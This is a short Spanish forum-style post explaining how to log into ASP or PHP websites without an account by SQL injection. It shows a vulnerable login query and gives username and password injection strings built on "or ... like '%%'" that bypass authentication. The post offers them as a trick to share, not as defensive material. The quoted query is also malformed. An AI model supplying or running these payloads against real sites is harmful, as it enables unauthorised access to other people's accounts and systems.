acceder a una web que pide identificacion
Inyeccion SQL.
Según he leido, en los sitios ke piden username y password. Si está desarrollado con ASP o PHP. Podemos acceder sin cuenta pq lo verifican por SQL, algo como:
Select *
From Usuarios
Where user = ' & user &' and passw = 'passw'
Bien pues si en user y passw ponemos:
User: ' or user like '%%'
Password: 'or passw like '%%'
De esta manera no dejara entrar, este fallo funciona en muy pocas webs, pero me resulto tan obvio que quise compartirlo con uds.
Bye.